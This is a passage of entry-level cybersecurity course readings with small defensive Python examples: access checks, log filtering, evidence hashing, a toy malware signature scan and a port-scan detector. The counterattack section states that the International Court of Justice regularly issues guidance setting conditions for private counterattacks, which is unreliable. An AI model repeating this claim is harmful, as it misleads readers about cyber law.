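    "public_site": {"hr_admin", "payroll_admin", "guest"},
}

def can_access(user, asset):
    """Confidentiality check: is this user authorized for this asset?"""
    return user in ACL.get(asset, set())

print(can_access("guest", "payroll_db"))     # → False
print(can_access("hr_admin", "payroll_db"))  # → True
```

Note how the sensitive asset (the payroll database) has a much shorter authorized list than the public website, reflecting the earlier point that higher-value assets warrant tighter controls.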
Course 3
Controls, frameworks, and compliance
Previously, you were introduced to security frameworks and how they provide a
structured approach to implementing a security lifecycle. As a reminder, a security lifecycle
is a constantly evolving set of policies and standards. In this reading, you will learn more
about how security frameworks, controls, and compliance regulations—or laws—are used
together to manage security and make sure everyone does their part to minimize risk.
How controls, frameworks, and compliance are related
The confidentiality, integrity, and availability (CIA) triad is a model that helps inform how
organizations consider risk when setting up systems and security policies.
CIA are the three foundational principles used by cybersecurity professionals to establish
appropriate controls that mitigate threats, risks, and vulnerabilities.
As you may recall, security controls are safeguards designed to reduce specific security
risks. So they are used alongside frameworks to ensure that security goals and processes
are implemented correctly and that organizations meet regulatory compliance
requirements.
Security frameworks are guidelines used for building plans to help mitigate risks and
threats to data and privacy. They have four core components:
1. Identifying and documenting security goals
2. Setting guidelines to achieve security goals
3. Implementing strong security processes
4. Monitoring and communicating results
Compliance is the process of adhering to internal standards and external regulations.
Specific controls, frameworks, and compliance
The National Institute of Standards and Technology (NIST) is a U.S.-based agency that
develops multiple voluntary compliance frameworks that organizations worldwide can use
to help manage risk. The more aligned an organization is with compliance, the lower the
risk.
Examples of frameworks include the NIST Cybersecurity Framework (CSF) and the NIST
Risk Management Framework (RMF).
Note: Specifications and guidelines can change depending on the type of organization you
work for.
In addition to the NIST CSF and NIST RMF, there are several other controls, frameworks,
and compliance standards that it is important for security professionals to be familiar with
to help keep organizations and the people they serve safe.
The Federal Energy Regulatory Commission - North American Electric Reliability
Corporation (FERC-NERC)
FERC-NERC is a regulation that applies to organizations that work with electricity or that
are involved with the U.S. and North American power grid. These types of organizations
have an obligation to prepare for, mitigate, and report any potential security incident that
can negatively affect the power grid. They are also legally required to adhere to the Critical
Infrastructure Protection (CIP) Reliability Standards defined by the FERC.
The Federal Risk and Authorization Management Program (FedRAMP®)
FedRAMP is a U.S. federal government program that standardizes security assessment,
authorization, monitoring, and handling of cloud services and product offerings. Its
purpose is to provide consistency across the government sector and third-party cloud
providers.
Center for Internet Security (CIS®)
CIS is a nonprofit with multiple areas of emphasis. It provides a set of controls that can be
used to safeguard systems and networks against attacks. Its purpose is to help
organizations establish a better plan of defense. CIS also provides actionable controls that
security professionals may follow if a security incident occurs.
General Data Protection Regulation (GDPR)
GDPR is a European Union (E.U.) general data regulation that protects the processing of
E.U. residents’ data and their right to privacy in and out of E.U. territory. For example, if an
organization is not being transparent about the data they are holding about an E.U. citizen
and why they are holding that data, this is an infringement that can result in a fine to the
organization. Additionally, if a breach occurs and an E.U. citizen’s data is compromised,
they must be informed. The affected organization has 72 hours to notify the E.U. citizen
about the breach.
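As a simple illustration of that notification window, the deadline can be computed from the moment a breach is discovered. The discovery timestamp below is hypothetical:

```python
from datetime import datetime, timedelta

# Hypothetical time a breach was discovered.
discovered = datetime(2023, 11, 1, 9, 30)

# GDPR-style 72-hour notification window.
deadline = discovered + timedelta(hours=72)

print(deadline)  # → 2023-11-04 09:30:00
```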
Payment Card Industry Data Security Standard (PCI DSS)
PCI DSS is an international security standard meant to ensure that organizations storing,
accepting, processing, and transmitting credit card information do so in a secure
environment. The objective of this compliance standard is to reduce credit card fraud.
The Health Insurance Portability and Accountability Act (HIPAA)
HIPAA is a U.S. federal law established in 1996 to protect patients' health information. This
law prohibits patient information from being shared without their consent. It is governed
by three rules:
1. Privacy
2. Security
3. Breach notification
Organizations that store patient data have a legal obligation to inform patients of a breach
because if patients' Protected Health Information (PHI) is exposed, it can lead to identity
theft and insurance fraud. PHI relates to the past, present, or future physical or mental
health or condition of an individual, whether it’s a plan of care or payments for care. Along
with understanding HIPAA as a law, security professionals also need to be familiar with the
Health Information Trust Alliance (HITRUST®), which is a security framework and
assurance program that helps institutions meet HIPAA compliance.
International Organization for Standardization (ISO)
ISO was created to establish international standards related to technology, manufacturing,
and management across borders. It helps organizations improve their processes and
procedures for staff retention, planning, waste, and services.
System and Organizations Controls (SOC type 1, SOC type 2)
The American Institute of Certified Public Accountants® (AICPA) auditing standards board
developed this standard. SOC 1 and SOC 2 are a series of reports that focus on an
organization's user access policies at different organizational levels such as:
● Associate
● Supervisor
● Manager
● Executive
● Vendor
● Others
They are used to assess an organization’s financial compliance and levels of risk. They also
cover confidentiality, privacy, integrity, availability, security, and overall data safety.
Control failures in these areas can lead to fraud.
Pro tip: There are a number of regulations that are frequently revised. You are encouraged to keep
up-to-date with changes and explore more frameworks, controls, and compliance. Two suggestions
to research: the Gramm-Leach-Bliley Act and the Sarbanes-Oxley Act.
United States Presidential Executive Order 14028
On May 12, 2021, President Joe Biden released an executive order related to improving the nation’s
cybersecurity to remediate the increase in threat actor activity. Remediation efforts are directed
toward federal agencies and third parties with ties to U.S. critical infrastructure. For additional
information, review the Executive Order on Improving the Nation’s Cybersecurity.
Key takeaways
In this reading you learned more about controls, frameworks, and compliance. You also learned
how they work together to help organizations maintain a low level of risk.
As a security analyst, it’s important to stay up-to-date on common frameworks, controls, and
compliance regulations and be aware of changes to the cybersecurity landscape to help ensure the
safety of both organizations and people.
In security, new technologies present new challenges. For every new security incident or risk, the
right or wrong decision isn't always clear. For example, imagine that you're working as an entry-level security analyst and you have received a high-risk alert. You investigate the alert and discover
data has been transferred without authorization. You work diligently to identify who made the
transfer and discover it is one of your friends from work. What do you do? Ethically, as a security
professional, your job is to remain unbiased and maintain security and confidentiality. While it's
normal to want to protect a friend, regardless of who the user in question may be, your
responsibility and obligation is to adhere to the policies and protocols you've been trained to
follow. In many cases, security teams are entrusted with greater access to data and information
than other employees. Security professionals must always respect that privilege and act ethically.
Security ethics are guidelines for making appropriate decisions as a security professional. As
another example, if you as an analyst can grant yourself access to payroll data and can give yourself
a raise, just because you have access to do so, does that mean you should? The answer is no. You
should never abuse the access you've been granted and entrusted with. Let's discuss ethical
principles that may raise questions as you navigate solutions for mitigating risks. These are
confidentiality, privacy protections, and laws. Let's begin with the first ethical principle,
confidentiality. Earlier we discussed confidentiality as part of the CIA triad. Now let's discuss how
confidentiality can be applied to ethics. As a security professional, you'll encounter proprietary or
private information, such as PII. It's your ethical duty to keep that information confidential and safe.
For example, you may want to help a coworker by providing computer system access outside of
properly documented channels. However, this ethical violation can result in serious consequences,
including reprimands, the loss of your professional reputation, and legal repercussions for both you
and your friend. The second ethical principle to consider is privacy protections. Privacy protection
means safeguarding personal information from unauthorized use. For example, imagine you receive
a personal email after hours from your manager requesting a colleague's home phone number. Your
manager explains that they can't access the employee database now, but they need to discuss an
urgent matter with that person. As a security analyst, your role is to follow the policies and
procedures of your company, which in this example, state that employee information is stored in a
secure database and should never be accessed or shared in any other format. So, accessing and
sharing the employee's personal information would be unethical. In situations like this, it can be
difficult to know what to do. So, the best response is to adhere to the policies and procedures set by
your organization. A third important ethical principle we must discuss is the law. Laws are rules
that are recognized by a community and enforced by a governing entity. For example, consider a
staff member at a hospital who has been trained to handle PII, and SPII for compliance. The staff
member has files with confidential data that should never be left unsupervised, but the staff
member is late for a meeting. Instead of locking the files in a designated area, the files are left on the
staff member's desk, unsupervised. Upon the employee's return, the files are missing. The staff
member has just violated multiple compliance regulations, and their actions were unethical and
illegal, since their negligence has likely resulted in the loss of private patient and hospital data. As
you enter the security field, remember that technology is constantly evolving, and so are attackers'
tactics and techniques. Because of this, security professionals must continue to think critically
about how to respond to attacks. Having a strong sense of ethics can guide your decisions to ensure
that the proper processes and procedures are followed to mitigate these continually evolving risks.
Ethical concepts that guide cybersecurity decisions
Previously, you were introduced to the concept of security ethics. Security ethics are guidelines for
making appropriate decisions as a security professional. Being ethical requires that security
professionals remain unbiased and maintain the security and confidentiality of private data. Having a
strong sense of ethics can help you navigate your decisions as a cybersecurity professional so you’re
able to mitigate threats posed by threat actors’ constantly evolving tactics and techniques. In this
reading, you’ll learn about more ethical concepts that are essential to know so you can make appropriate
decisions about how to respond to attacks legally and ethically in a way that protects organizations and
people alike.
Ethical concerns and laws related to counterattacks
United States standpoint on counterattacks
In the U.S., deploying a counterattack on a threat actor is illegal because of laws like the Computer Fraud
and Abuse Act of 1986 and the Cybersecurity Information Sharing Act of 2015, among others. You can
only defend. The act of counterattacking in the U.S. is perceived as an act of vigilantism. A vigilante is a
person who is not a member of law enforcement who decides to stop a crime on their own. And because
threat actors are criminals, counterattacks can lead to further escalation of the attack, which can cause
even more damage and harm. Lastly, if the threat actor in question is a state-sponsored hacktivist, a
counterattack can lead to serious international implications. A hacktivist is a person who uses hacking to
achieve a political goal. The political goal may be to promote social change or civil disobedience.
For these reasons, the only individuals in the U.S. who are allowed to counterattack are approved
employees of the federal government or military personnel.
International standpoint on counterattacks
The International Court of Justice (ICJ), which updates its guidance regularly, states that a person or
group can counterattack if:
● The counterattack will only affect the party that attacked first.
● The counterattack is a direct communication asking the initial attacker to stop.
● The counterattack does not escalate the situation.
● The counterattack effects can be reversed.
Organizations typically do not counterattack because the above scenarios and parameters are hard to
measure. There is a lot of uncertainty dictating what is and is not lawful, and at times negative outcomes
are very difficult to control. Counterattack actions generally lead to a worse outcome, especially when
you are not an experienced professional in the field.
To learn more about specific scenarios and ethical concerns from an international perspective, review
updates provided in the Tallinn Manual online.
Ethical principles and methodologies
Because counterattacks are generally disapproved of or illegal, the security realm has created
frameworks and controls—such as the confidentiality, integrity, and availability (CIA) triad and others
discussed earlier in the program—to address issues of confidentiality, privacy protections, and laws. To
better understand the relationship between these issues and the ethical obligations of cybersecurity
professionals, review the following key concepts as they relate to using ethics to protect organizations
and the people they serve.
Confidentiality means that only authorized users can access specific assets or data. Confidentiality as it
relates to professional ethics means that there needs to be a high level of respect for privacy to
safeguard private assets and data.
Privacy protection means safeguarding personal information from unauthorized use. Personally
identifiable information (PII) and sensitive personally identifiable information (SPII) are types of
personal data that can cause people harm if they are stolen. PII data is any information used to infer an
individual's identity, like their name and phone number. SPII data is a specific type of PII that falls under
stricter handling guidelines, including social security numbers and credit card numbers. To effectively
safeguard PII and SPII data, security professionals hold an ethical obligation to secure private
information, identify security vulnerabilities, manage organizational risks, and align security with
business goals.
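One common way to safeguard SPII in practice is redaction. The sketch below masks U.S. social security-style numbers with a regular expression; it is a minimal, hypothetical example, and production data loss prevention tools are far more sophisticated:

```python
import re

# Pattern for U.S. social security-style numbers (e.g., 123-45-6789).
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def redact_ssn(text):
    """Replace SSN-like values so SPII never appears in plain text."""
    return SSN_PATTERN.sub("[REDACTED]", text)

record = "Patient SSN: 123-45-6789, phone: 555-0100"
print(redact_ssn(record))  # → Patient SSN: [REDACTED], phone: 555-0100
```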
Laws are rules that are recognized by a community and enforced by a governing entity. As a security
professional, you will have an ethical obligation to protect your organization, its internal infrastructure,
and the people involved with the organization. To do this:
● You must remain unbiased and conduct your work honestly, responsibly, and with the highest respect for the law.
● Be transparent and just, and rely on evidence.
● Ensure that you are consistently invested in the work you are doing, so you can appropriately and ethically address issues that arise.
● Stay informed and strive to advance your skills, so you can contribute to the betterment of the cyber landscape.
As an example, consider the Health Insurance Portability and Accountability Act (HIPAA), which is a U.S.
federal law established to protect patients' health information, also known as PHI, or protected health
information. This law prohibits patient information from being shared without their consent. So, as a
security professional, you might help ensure that the organization you work for adheres to both its legal
and ethical obligation to inform patients of a breach if their health care data is exposed.
Key takeaways
As a future security professional, ethics will play a large role in your daily work. Understanding ethics
and laws will help you make the correct choices if and when you encounter a security threat or an
incident that results in a breach.
Terms and definitions from Course 1, Module 3
Asset: An item perceived as having value to an organization
Availability: The idea that data is accessible to those who are authorized to access it
Compliance: The process of adhering to internal standards and external regulations
Confidentiality: The idea that only authorized users can access specific assets or data
Confidentiality, integrity, availability (CIA) triad: A model that helps inform how organizations
consider risk when setting up systems and security policies
Hacktivist: A person who uses hacking to achieve a political goal
Health Insurance Portability and Accountability Act (HIPAA): A U.S. federal law established to
protect patients' health information
Integrity: The idea that the data is correct, authentic, and reliable
National Institute of Standards and Technology (NIST) Cyber Security Framework (CSF): A voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
Privacy protection: The act of safeguarding personal information from unauthorized use
Protected health information (PHI): Information that relates to the past, present, or future physical
or mental health or condition of an individual
Security architecture: A type of security design composed of multiple components, such as tools and
processes, that are used to protect an organization from risks and external threats
Security controls: Safeguards designed to reduce specific security risks
Security ethics: Guidelines for making appropriate decisions as a security professional
Security frameworks: Guidelines used for building plans to help mitigate risk and threats to data
and privacy
Security governance: Practices that help support, define, and direct security efforts of an
organization
Sensitive personally identifiable information (SPII): A specific type of PII that falls under stricter
handling guidelines
Cybersecurity Tools
As mentioned earlier, security is like preparing for a storm. If you identify a leak, the color or shape
of the bucket you use to catch the water doesn't matter. What is important is mitigating the risks
and threats to your home, by using the tools available to you. As an entry-level security analyst,
you'll have a lot of tools in your toolkit that you can use to mitigate potential risks. In this video,
we'll discuss the primary purposes and functions of some commonly used security tools. And later
in the program, you'll have hands-on opportunities to practice using them. Before discussing tools
further, let's briefly discuss logs, which are the source of data that the tools we'll cover are designed
to organize. A log is a record of events that occur within an organization's systems. Examples of
security-related logs include records of employees signing into their computers or accessing web-based services. Logs help security professionals identify vulnerabilities and potential security
breaches. The first tools we'll discuss are security information and event management tools, or SIEM
tools. A SIEM tool is an application that collects and analyzes log data to monitor critical activities in
an organization. The acronym S-I-E-M may be pronounced as 'sim' or 'seem', but we'll use 'sim'
throughout this program. SIEM tools collect real-time, or instant, information, and allow security
analysts to identify potential breaches as they happen. Imagine having to read pages and pages of
logs to determine if there are any security threats. Depending on the amount of data, it could take
hours or days. SIEM tools reduce the amount of data an analyst must review by providing alerts for
specific types of risks and threats. Next, let's go over examples of commonly used SIEM tools:
Splunk and Chronicle. Splunk is a data analysis platform, and Splunk Enterprise provides SIEM
solutions. Splunk Enterprise is a self-hosted tool used to retain, analyze, and search an
organization's log data. Another SIEM tool is Google's Chronicle. Chronicle is a cloud-native SIEM
tool that stores security data for search and analysis. Cloud-native means that Chronicle allows for
fast delivery of new features. Both SIEM tools, and SIEMs in general, collect data from multiple
places, then analyze and filter that data to allow security teams to prevent and quickly react to
potential security threats. As a security analyst, you may find yourself using SIEM tools to analyze
filtered events and patterns, perform incident analysis, or proactively search for threats. Depending
on your organization's SIEM setup and risk focus, the tools and how they function may differ, but
ultimately, they are all used to mitigate risk. Other key tools that you will use in your role as a
security analyst, and that you'll have hands-on opportunities to use later in the program, are
playbooks and network protocol analyzers. A playbook is a manual that provides details about any
operational action, such as how to respond to an incident. Playbooks, which vary from one
organization to the next, guide analysts in how to handle a security incident before, during, and
after it has occurred. Playbooks can pertain to security or compliance reviews, access management,
and many other organizational tasks that require a documented process from beginning to end.
Another tool you may use as a security analyst is a network protocol analyzer, also called a packet sniffer. A packet sniffer is a tool designed to capture and analyze data traffic within a network.
Common network protocol analyzers include tcpdump and Wireshark. As an entry-level analyst,
you don't have to be an expert in these tools. As you continue through this certificate program and
get more hands-on practice, you'll continuously build your understanding of how to use these tools
to identify, assess, and mitigate risks.
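The core idea behind a SIEM tool, filtering a large volume of log entries down to a short list of alerts, can be sketched in a few lines of Python. The log format and the alert rule below are invented for illustration; real SIEM platforms such as Splunk or Chronicle use far richer rule languages.

```python
# Minimal sketch of SIEM-style alerting: scan log entries and surface
# only the event types an analyst has flagged as risky.
# The log format and rule set here are invented for illustration.

def generate_alerts(log_entries, risky_events):
    """Return only the entries whose event type matches a risky rule."""
    alerts = []
    for entry in log_entries:
        if entry["event"] in risky_events:
            alerts.append(entry)
    return alerts

logs = [
    {"time": "09:01", "user": "asmith", "event": "login_success"},
    {"time": "09:02", "user": "asmith", "event": "login_failure"},
    {"time": "09:02", "user": "asmith", "event": "login_failure"},
    {"time": "09:15", "user": "bjones", "event": "file_download"},
]

alerts = generate_alerts(logs, risky_events={"login_failure"})
print(len(alerts))  # 2 alerts to review instead of 4 raw entries
```

Even in this toy form, the analyst reviews two alerts rather than every raw entry, which is exactly the data-reduction benefit described above.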
Tools for protecting business operations
Previously, you were introduced to several technical skills that security analysts need to develop. You
were also introduced to some tools entry-level security analysts may have in their toolkit. In this
reading, you’ll learn more about how technical skills and tools help security analysts mitigate risks.
An entry-level analyst’s toolkit
Every organization may provide a different toolkit, depending on its security needs. As a future analyst,
it’s important that you are familiar with industry standard tools and can demonstrate your ability to
learn how to use similar tools in a potential workplace.
Security information and event management (SIEM) tools
A SIEM tool is an application that collects and analyzes log data to monitor critical activities in an
organization. A log is a record of events that occur within an organization’s systems. Depending on the
amount of data you’re working with, it could take hours or days to filter through log data on your own.
SIEM tools reduce the amount of data an analyst must review by providing alerts for specific types of
threats, risks, and vulnerabilities.
SIEM tools provide a series of dashboards that visually organize data into categories, allowing users to
select the data they wish to analyze. Different SIEM tools have different dashboard types that display the
information you have access to.
SIEM tools also come with different hosting options, including on-premise and cloud. Organizations may
choose one hosting option over another based on a security team member’s expertise. For example,
because a cloud-hosted version tends to be easier to set up, use, and maintain than an on-premise
version, a less experienced security team may choose this option for their organization.
Network protocol analyzers (packet sniffers)
A network protocol analyzer, also known as a packet sniffer, is a tool designed to capture and analyze
data traffic in a network. This means that the tool keeps a record of all the data that a computer within
an organization's network encounters. Later in the program, you’ll have an opportunity to practice using
some common network protocol analyzer (packet sniffer) tools.
Playbooks
A playbook is a manual that provides details about any operational action, such as how to respond to a
security incident. Organizations usually have multiple playbooks documenting processes and
procedures for their teams to follow. Playbooks vary from one organization to the next, but they all have
a similar purpose: to guide analysts through a series of steps to complete specific security-related
tasks.
For example, consider the following scenario: You are working as a security analyst for an incident
response firm. You are given a case involving a small medical practice that has suffered a security
breach. Your job is to help with the forensic investigation and provide evidence to a cybersecurity
insurance company. They will then use your investigative findings to determine whether the medical
practice will receive their insurance payout.
In this scenario, playbooks would outline the specific actions you need to take to conduct the
investigation. Playbooks also help ensure that you are following proper protocols and procedures. When
working on a forensic case, there are two playbooks you might follow:
● The first type of playbook you might consult is called the chain of custody playbook. Chain of
custody is the process of documenting evidence possession and control during an incident
lifecycle. As a security analyst involved in a forensic analysis, you will work with the computer
data that was breached. You and the forensic team will also need to document who, what, where,
and why you have the collected evidence. The evidence is your responsibility while it is in your
possession. Evidence must be kept safe and tracked. Every time evidence is moved, it should be
reported. This allows all parties involved to know exactly where the evidence is at all times.
● The second playbook your team might use is called the protecting and preserving evidence
playbook. Protecting and preserving evidence is the process of properly working with fragile
and volatile digital evidence. As a security analyst, understanding what fragile and volatile
digital evidence is, along with why there is a procedure, is critical. As you follow this playbook,
you will consult the order of volatility, which is a sequence outlining the order of data that must
be preserved from first to last. It prioritizes volatile data, which is data that may be lost if the
device in question powers off, regardless of the reason. While conducting an investigation,
improper management of digital evidence can compromise and alter that evidence. When
evidence is improperly managed during an investigation, it can no longer be used. For this
reason, the first priority in any investigation is to properly preserve the data. You can preserve
the data by making copies and conducting your investigation using those copies.
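Two practices from these playbooks, working only on copies and logging every evidence transfer, can be illustrated with Python's standard `hashlib` module. The evidence contents and the custody-log fields below are hypothetical; real forensic workflows use dedicated tooling and formal documentation.

```python
import hashlib

def sha256_of(data: bytes) -> str:
    """Return the SHA-256 digest of the evidence bytes as hex."""
    return hashlib.sha256(data).hexdigest()

# Hash the original evidence once, at collection time.
original = b"contents of the breached drive image"  # hypothetical
baseline_hash = sha256_of(original)

# Investigators work on a copy; re-hashing proves it is unaltered.
working_copy = bytes(original)
assert sha256_of(working_copy) == baseline_hash

# A simple chain-of-custody record: every transfer is logged.
custody_log = []

def record_transfer(item, from_person, to_person, log=custody_log):
    log.append({"item": item, "from": from_person, "to": to_person})

record_transfer("drive-image-001", "first responder", "forensic analyst")
print(custody_log[0]["to"])  # forensic analyst
```

If the copy's hash ever stops matching the baseline, the evidence has been altered and can no longer be relied on, which is why preservation comes first.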
Key takeaways
In this reading, you learned about a few tools a security analyst may have in their toolkit, depending on
where they work. You also explored two important types of playbooks: chain of custody and protecting
and preserving evidence. However, these are only two procedures that occur at the beginning of a
forensic investigation. If forensic investigations interest you, you are encouraged to further explore this
career path or security practice. In the process, you may learn about forensic tools that you want to add
to your toolkit. While all of the forensic components that make up an investigation will not be covered in
this certificate program, some forensic concepts will be discussed in later courses.
Resources for more information
The Google Cybersecurity Action Team's Threat Horizon Report provides strategic intelligence for
dealing with threats to cloud enterprise.
The Cybersecurity & Infrastructure Security Agency (CISA) has a list of Free Cybersecurity Services and
Tools. Review the list to learn more about open-source cybersecurity tools.
As we discussed previously, organizations use a variety of tools, such as SIEMs, playbooks, and
packet sniffers to better manage, monitor, and analyze security threats. But those aren't the only
tools in an analyst's toolkit. Analysts also use programming languages and operating systems to
accomplish essential tasks. In this video, we'll introduce you to Python and SQL programming, and the Linux operating system, all of which you'll have an opportunity to practice using later in the certificate program. Organizations can use programming to create a specific set of instructions for a
computer to execute tasks. Programming allows analysts to complete repetitive tasks and processes
with a high degree of accuracy and efficiency. It also helps reduce the risk of human error and can
save hours or days compared to performing the work manually. Now that you're aware of what
programming languages are used for, let's discuss a specific and related operating system called
Linux, and two programming languages: SQL and Python.
Linux is an open-source, or publicly available, operating system. Unlike other operating systems
you may be familiar with, for example MacOS or Windows, Linux relies on a command line as the
primary user interface. Linux itself is not a programming language, but it does allow for the use of
text-based commands between the user and the operating system. You'll learn more about Linux
later in the program. A common use of Linux for entry-level security analysts is examining logs to
better understand what's occurring in a system. For example, you might find yourself using
commands to review an error log when investigating uncommonly high network traffic.
SQL stands for Structured Query Language. SQL is a programming language used to create, interact
with, and request information from a database. A database is an organized collection of information
or data. There may be millions of data points in a database. An entry-level security analyst would
use SQL to filter through the data points to retrieve specific information.
Python. Security professionals can use Python to perform tasks that are repetitive and time-consuming and that require a high level of detail and accuracy. As a future analyst, it's important to
understand that every organization's toolkit may be somewhat different based on their security
needs.
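As a concrete illustration of the kind of repetitive log review Python can automate, here is a short sketch that counts failed login attempts per user. The log line format is invented; real logs, such as Linux authentication logs, need a format-specific parser.

```python
# Count failed login attempts per user from raw log lines.
# The log format here is invented for illustration.
from collections import Counter

log_lines = [
    "2023-11-01 09:02 FAILED LOGIN user=asmith",
    "2023-11-01 09:03 FAILED LOGIN user=asmith",
    "2023-11-01 09:04 LOGIN OK user=bjones",
    "2023-11-01 09:05 FAILED LOGIN user=cdoe",
]

failures = Counter()
for line in log_lines:
    if "FAILED LOGIN" in line:
        user = line.split("user=")[1]
        failures[user] += 1

print(failures["asmith"])  # 2
```

Doing this by hand across thousands of lines would take hours; a script like this runs in seconds and never miscounts, which is the accuracy and efficiency benefit described above.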
Use tools to protect business operations
Previously, you were introduced to programming, operating systems, and tools commonly used by
cybersecurity professionals. In this reading, you’ll learn more about programming and operating
systems, as well as other tools that entry-level analysts use to help protect organizations and the people
they serve.
Tools and their purposes
Programming
Programming is a process that can be used to create a specific set of instructions for a computer to
execute tasks. Security analysts use programming languages, such as Python, to execute automation.
Automation is the use of technology to reduce human and manual effort in performing common and
repetitive tasks. Automation also helps reduce the risk of human error.
Another programming language used by analysts is called Structured Query Language (SQL). SQL is used
to create, interact with, and request information from a database. A database is an organized collection
of information or data. There can be millions of data points in a database. A data point is a specific piece
of information.
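One quick way to see how SQL filters data points is Python's built-in `sqlite3` module, which embeds a small SQL database. The table name and values below are invented for illustration.

```python
import sqlite3

# Build an in-memory database with a hypothetical login table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE logins (username TEXT, success INTEGER)")
conn.executemany(
    "INSERT INTO logins VALUES (?, ?)",
    [("asmith", 1), ("asmith", 0), ("bjones", 1), ("cdoe", 0)],
)

# SQL filters the data points down to just the failed logins.
rows = conn.execute(
    "SELECT username FROM logins WHERE username IN "
    "(SELECT username FROM logins WHERE success = 0) AND success = 0 "
    "ORDER BY username"
).fetchall()
print([r[0] for r in rows])  # ['asmith', 'cdoe']
conn.close()
```

The same `WHERE` clause works unchanged whether the table holds four rows or millions, which is why analysts reach for SQL rather than scanning records manually.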
Operating systems
An operating system is the interface between computer hardware and the user. Linux®, macOS®, and
Windows are operating systems. They each offer different functionality and user experiences.
Previously, you were introduced to Linux as an open-source operating system. Open source means that
the code is available to the public and allows people to make contributions to improve the software.
Linux is not a programming language; however, it does involve the use of a command line within the
operating system. A command is an instruction telling the computer to do something. A command-line
interface is a text-based user interface that uses commands to interact with the computer. You will learn
more about Linux, including the Linux kernel and GNU, in a later course.
Web vulnerability
A web vulnerability is a unique flaw in a web application that a threat actor could exploit using malicious code or behavior to allow unauthorized access, data theft, or malware deployment.
To stay up-to-date on the most critical risks to web applications, review the Open Web Application
Security Project (OWASP) Top 10.
Antivirus software
Antivirus software is a software program used to prevent, detect, and eliminate malware and viruses. It
is also called anti-malware. Depending on the type of antivirus software, it can scan the memory of a
device to find patterns that indicate the presence of malware.
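The pattern-scanning idea mentioned above can be sketched as a search for known byte signatures in a buffer. This is a deliberately simplified toy: the signatures are invented, and real antivirus engines also rely on heuristics, emulation, and behavioral analysis.

```python
# Toy signature scan: flag a buffer if it contains any known
# malicious byte pattern. Signatures are invented for illustration;
# real engines are far more sophisticated.
KNOWN_SIGNATURES = [b"\xde\xad\xbe\xef", b"EVIL_PAYLOAD"]

def scan(buffer: bytes) -> bool:
    """Return True if any known signature appears in the buffer."""
    return any(sig in buffer for sig in KNOWN_SIGNATURES)

clean = b"ordinary process memory"
infected = b"header...EVIL_PAYLOAD...trailer"
print(scan(clean), scan(infected))  # False True
```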
Intrusion detection system
An intrusion detection system (IDS) is an application that monitors system activity and alerts on possible
intrusions. The system scans and analyzes network packets, which carry small amounts of data through
a network. Because each packet carries only a small amount of data, the detection process is easier, allowing an IDS to identify potential threats to sensitive data more readily. Other occurrences an IDS might detect include theft and unauthorized access.
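The monitor-and-alert behavior of an IDS can be illustrated with a tiny rule-based check over packet metadata. The packet fields and the port threshold below are invented; production systems apply large signature sets and statistical models.

```python
# Tiny rule-based IDS sketch: alert when one source contacts many
# distinct ports (a common port-scan indicator). Fields and the
# threshold are invented for illustration.
from collections import defaultdict

def detect_port_scans(packets, port_threshold=3):
    """Return source addresses that touched >= port_threshold ports."""
    ports_by_source = defaultdict(set)
    for pkt in packets:
        ports_by_source[pkt["src"]].add(pkt["dst_port"])
    return [src for src, ports in ports_by_source.items()
            if len(ports) >= port_threshold]

packets = [
    {"src": "10.0.0.5", "dst_port": 22},
    {"src": "10.0.0.5", "dst_port": 23},
    {"src": "10.0.0.5", "dst_port": 80},
    {"src": "10.0.0.9", "dst_port": 443},
]
print(detect_port_scans(packets))  # ['10.0.0.5']
```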
Encryption
Encryption makes data unreadable and difficult to decode for an unauthorized user; its main goal is to
ensure confidentiality of private data. Encryption is the process of converting data from a readable
format to a cryptographically encoded format. Cryptographic encoding means converting plaintext into
secure ciphertext. Plaintext is unencrypted information and secure ciphertext is the result of
encryption.
Note: Encoding and encryption serve different purposes. Encoding uses a public conversion algorithm to
enable systems that use different data representations to share information.
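The note's distinction can be demonstrated concretely: encoding uses a public algorithm that anyone can reverse, while encryption requires a secret key. The XOR cipher below is a toy used only to illustrate the key requirement; it is not a secure algorithm.

```python
import base64

# Encoding: public algorithm, no key, no confidentiality.
plaintext = b"patient record 123"
encoded = base64.b64encode(plaintext)
assert base64.b64decode(encoded) == plaintext  # anyone can reverse it

# Encryption (toy XOR cipher, NOT secure -- illustration only):
# without the key, the ciphertext is unreadable.
def xor_cipher(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"secret"
ciphertext = xor_cipher(plaintext, key)
assert ciphertext != plaintext                   # unreadable without key
assert xor_cipher(ciphertext, key) == plaintext  # key recovers it
```

Because Base64 decoding needs no key, encoding provides interoperability, not confidentiality; only the keyed transformation keeps the data private.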
Penetration testing
Penetration testing, also called pen testing, is the act of participating in a simulated attack that helps
identify vulnerabilities in systems, networks, websites, applications, and processes. It is a thorough risk
assessment that can evaluate and identify external and internal threats as well as weaknesses.
Key takeaways
In this reading, you learned more about programming and operating systems. You were also introduced
to several new tools and processes. Every organization selects their own set of tools. Therefore, the
more tools you know, the more valuable you are to an organization. Tools help security analysts
complete their tasks more efficiently and effectively.
Create a cybersecurity portfolio
Throughout this certificate program, you will have multiple opportunities to develop a professional
cybersecurity portfolio to showcase your security skills and knowledge.
In this reading, you’ll learn what a portfolio is and why it’s important to develop a professional
cybersecurity portfolio. You’ll also learn about options for creating an online or self-hosted portfolio that
you can share with potential employers when you begin to look for cybersecurity jobs.
What is a portfolio, and why is it necessary?
Cybersecurity professionals use portfolios to demonstrate their security education, skills, and
knowledge. Professionals typically use portfolios when they apply for jobs to show potential employers
that they are passionate about their work and can do the job they are applying for. Portfolios are more in-depth than a resume, which is typically a one-to-two page summary of relevant education, work
experience, and accomplishments. You will have the opportunity to develop a resume, and finalize your
portfolio, in the last course of this program.
Options for creating your portfolio
There are many ways to present a portfolio, including self-hosted and online options such as:
● Documents folder
● Google Drive or Dropbox™
● Google Sites
● Git repository
Option 2: Google Drive or Dropbox
Description: Google Drive and Dropbox offer similar features that allow you to store your professional
documentation on a cloud platform. Both options also have file-sharing features, so you can easily share
your portfolio documents with potential employers. Any additions or changes you make to a document
within that folder will be updated automatically for anyone with access to your portfolio.
Similar to a documents folder, keeping your Google Drive or Dropbox-based portfolio well organized will
be helpful as you begin or progress through your career.
Setup: To learn how to upload and share files on these applications, visit the Google Drive and Dropbox
websites for more information.
Option 3: Google Sites
Description: Google Sites and similar website hosting options have a variety of easy-to-use features to
help you present your portfolio items, including customizable layouts, responsive webpages, embedded
content capabilities, and web publishing.
